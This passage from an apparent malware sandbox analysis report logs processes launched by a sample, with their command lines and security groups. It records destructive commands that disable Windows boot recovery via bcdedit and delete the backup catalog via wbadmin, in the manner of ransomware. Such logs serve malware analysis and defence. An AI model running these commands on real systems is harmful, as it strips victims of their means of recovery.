AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0006303c" [0xc000000f] Thread: id = 377 os_tid = 0xaa8 Thread: id = 378 os_tid = 0xf28 Thread: id = 379 os_tid = 0x614 Thread: id = 380 os_tid = 0x690 Thread: id = 381 os_tid = 0x7d8 Thread: id = 382 os_tid = 0xf2c Thread: id = 383 os_tid = 0x760 Thread: id = 389 os_tid = 0xf4c Process: id = "11" image_name = "bcdedit.exe" filename = "c:\\windows\\system32\\bcdedit.exe" page_root = "0x16705000" os_pid = "0xb78" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x754" cmd_line = "bcdedit /set {default} bootstatuspolicy ignoreallfailures " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 384 os_tid = 0xa94 Process: id = "12" image_name = "bcdedit.exe" filename = "c:\\windows\\system32\\bcdedit.exe" page_root = "0x4cb0a000" os_pid = "0xb80" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x754" cmd_line = "bcdedit /set {default} recoveryenabled no " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 385 os_tid = 0xb7c Process: id = "13" image_name = "wbadmin.exe" filename = "c:\\windows\\system32\\wbadmin.exe" page_root = "0x4b912000" os_pid = "0x4e8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x754" cmd_line = "wbadmin delete catalog -quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 386 os_tid = 0xb44 Thread: id = 387 os_tid = 0x224 Thread: id = 388 os_tid = 0x73c Thread: id = 392 os_tid = 0xf5c